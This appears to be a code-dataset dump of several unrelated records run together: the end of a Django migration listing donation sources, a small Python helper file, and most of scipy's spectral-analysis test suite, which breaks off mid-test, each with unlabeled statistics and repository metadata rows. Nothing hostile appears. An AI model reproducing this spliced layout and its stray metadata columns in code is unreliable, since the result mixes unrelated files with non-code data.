verbose_name='Source'),
),
migrations.AlterField(
model_name='pledge',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, verbose_name='Source'),
),
]
| 197.032258
| 1,828
| 0.662737
| 754
| 6,108
| 5.346154
| 0.167109
| 0.026792
| 0.029025
| 0.035723
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0.936492
| 0
| 0.089644
| 0.117878
| 6,108
| 30
| 1,829
| 203.6
| 0.6585
| 0.011133
| 0
| 0.521739
| 1
| 0
| 0.663243
| 0.096737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.086957
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
13dc36f680a34bf80232f6e50244bcea2b9c9bc7
| 127
|
py
|
Python
|
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_channels/inlinefuncs.py
|
volundmush/athanor_channels
|
78d9fb7e2432976e4ec7ef54f18f350bf9b96afd
|
[
"BSD-3-Clause"
] | null | null | null |
import athanor
def charactername(*args, **kwargs):
return args[1]
def accountname(*args, **kwargs):
return args[1]
| 12.7
| 35
| 0.669291
| 16
| 127
| 5.3125
| 0.5625
| 0.235294
| 0.376471
| 0.470588
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019417
| 0.188976
| 127
| 9
| 36
| 14.111111
| 0.805825
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
b95f442239c6121b35771c9d2e30434316de4c18
| 53,360
|
py
|
Python
|
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/signal/tests/test_spectral.py
|
ririw/scipy
|
680ecf8c52966343827903e6b7983b1ef7323fe2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_, assert_approx_equal,
assert_allclose, assert_array_equal, assert_equal,
assert_array_almost_equal_nulp, suppress_warnings)
import pytest
from pytest import raises as assert_raises
from scipy import signal
from scipy.fft import fftfreq
from scipy.signal import (periodogram, welch, lombscargle, csd, coherence,
spectrogram, stft, istft, check_COLA, check_NOLA)
from scipy.signal.spectral import _spectral_helper
class TestPeriodogram(object):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_odd(self):
x = np.zeros(15)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 1/16.0)
q[0] = 0
assert_allclose(p, q)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, scaling='spectrum')
g, q = periodogram(x, scaling='density')
assert_allclose(f, np.linspace(0, 0.5, 9))
assert_allclose(p, q/16.0)
def test_integer_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_integer_odd(self):
x = np.zeros(15, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 1/16.0)
q[0] = 0
assert_allclose(p, q)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 5.0/16.0)
q[0] = 0
assert_allclose(p, q)
def test_unk_scaling(self):
assert_raises(ValueError, periodogram, np.zeros(4, np.complex128),
scaling='foo')
def test_nd_axis_m1(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((2,1,10))
x[:,:,0] = 1.0
f, p = periodogram(x)
assert_array_equal(p.shape, (2, 1, 6))
assert_array_almost_equal_nulp(p[0,0,:], p[1,0,:], 60)
f0, p0 = periodogram(x[0,0,:])
assert_array_almost_equal_nulp(p0[np.newaxis,:], p[1,:], 60)
def test_nd_axis_0(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((10,2,1))
x[0,:,:] = 1.0
f, p = periodogram(x, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_array_almost_equal_nulp(p[:,0,0], p[:,1,0], 60)
f0, p0 = periodogram(x[:,0,0])
assert_array_almost_equal_nulp(p0, p[:,1,0])
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, 10, 'hann')
win = signal.get_window('hann', 16)
fe, pe = periodogram(x, 10, win)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, periodogram, x,
10, win_err) # win longer than signal
def test_padded_fft(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
fp, pp = periodogram(x, nfft=32)
assert_allclose(f, fp[::2])
assert_allclose(p, pp[::2])
assert_array_equal(pp.shape, (17,))
def test_empty_input(self):
f, p = periodogram([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_nfft(self):
x = np.zeros(18)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_nfft_is_xshape(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9, 'f')
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(15, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8, 'f')
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 1/16.0, 'f')
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 5.0/16.0, 'f')
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
class TestWelch(object):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, welch, np.zeros(4, np.complex128),
scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = welch(x, nperseg=10, detrend=False)
f2, p2 = welch(x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = welch(x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = welch(x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = welch(x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, 10, 'hann', nperseg=8)
win = signal.get_window('hann', 8)
fe, pe = welch(x, 10, win, nperseg=None)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
assert_array_equal(fe.shape, (5,)) # because win length used as nperseg
assert_array_equal(pe.shape, (5,))
assert_raises(ValueError, welch, x,
10, win, nperseg=4) # because nperseg != win.shape[-1]
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, welch, x,
10, win_err, nperseg=None) # win longer than signal
def test_empty_input(self):
f, p = welch([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = welch(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = welch(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
#for string-like window, input signal length < nperseg value gives
#UserWarning, sets nperseg to x.shape[-1]
with suppress_warnings() as sup:
sup.filter(UserWarning, "nperseg = 256 is greater than input length = 8, using nperseg = 8")
f, p = welch(x,window='hann') # default nperseg
f1, p1 = welch(x,window='hann', nperseg=256) # user-specified nperseg
f2, p2 = welch(x, nperseg=8) # valid nperseg, doesn't give warning
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f2)
assert_allclose(p1, p2)
def test_window_long_or_nd(self):
assert_raises(ValueError, welch, np.zeros(4), 1, np.array([1,1,1,1,1]))
assert_raises(ValueError, welch, np.zeros(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = welch(x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, welch, np.zeros(4), 1, 'hann', 2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, welch, np.ones(12), nfft=3, nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477458, 0.23430935, 0.17072113, 0.17072116,
0.17072113], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
nfft = 24
f = fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
def test_window_correction(self):
A = 20
fs = 1e4
nperseg = int(fs//10)
fsig = 300
ii = int(fsig*nperseg//fs) # Freq index of fsig
tt = np.arange(fs)/fs
x = A*np.sin(2*np.pi*fsig*tt)
for window in ['hann', 'bartlett', ('tukey', 0.1), 'flattop']:
_, p_spec = welch(x, fs=fs, nperseg=nperseg, window=window,
scaling='spectrum')
freq, p_dens = welch(x, fs=fs, nperseg=nperseg, window=window,
scaling='density')
# Check peak height at signal frequency for 'spectrum'
assert_allclose(p_spec[ii], A**2/2.0)
# Check integrated spectrum RMS for 'density'
assert_allclose(np.sqrt(np.trapz(p_dens, freq)), A*np.sqrt(2)/2,
rtol=1e-3)
def test_axis_rolling(self):
np.random.seed(1234)
x_flat = np.random.randn(1024)
_, p_flat = welch(x_flat)
for a in range(3):
newshape = [1,]*3
newshape[a] = -1
x = x_flat.reshape(newshape)
_, p_plus = welch(x, axis=a) # Positive axis index
_, p_minus = welch(x, axis=a-x.ndim) # Negative axis index
assert_equal(p_flat, p_plus.squeeze(), err_msg=a)
assert_equal(p_flat, p_minus.squeeze(), err_msg=a-x.ndim)
def test_average(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, average='median')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([.1, .05, 0., 1.54074396e-33, 0.])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_raises(ValueError, welch, x, nperseg=8,
average='unrecognised-average')
class TestCSD:
def test_pad_shorter_x(self):
x = np.zeros(8)
y = np.zeros(12)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_pad_shorter_y(self):
x = np.zeros(12)
y = np.zeros(8)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, csd, np.zeros(4, np.complex128),
np.ones(4, np.complex128), scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = csd(x, x, nperseg=10, detrend=False)
f2, p2 = csd(x, x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = csd(x, x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = csd(x, x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[0,0,:], x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = csd(x, x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[:,0,0], x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = csd(x, x, 10, win, nperseg=None)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
assert_array_equal(fe.shape, (5,)) # because win length used as nperseg
assert_array_equal(pe.shape, (5,))
assert_raises(ValueError, csd, x, x,
10, win, nperseg=256) # because nperseg != win.shape[-1]
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, csd, x, x,
10, win_err, nperseg=None) # because win longer than signal
def test_empty_input(self):
f, p = csd([],np.zeros(10))
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
f, p = csd(np.zeros(10),[])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.ones(10), np.empty((5,0)))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
f, p = csd(np.empty((5,0)), np.ones(10))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.empty((10,10,3)), np.zeros((10,0,1)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
f, p = csd(np.empty((10,0,1)), np.zeros((10,10,3)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
#for string-like window, input signal length < nperseg value gives
#UserWarning, sets nperseg to x.shape[-1]
with suppress_warnings() as sup:
sup.filter(UserWarning, "nperseg = 256 is greater than input length = 8, using nperseg = 8")
f, p = csd(x, x, window='hann') # default nperseg
f1, p1 = csd(x, x, window='hann', nperseg=256) # user-specified nperseg
f2, p2 = csd(x, x, nperseg=8) # valid nperseg, doesn't give warning
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f2)
assert_allclose(p1, p2)
def test_window_long_or_nd(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
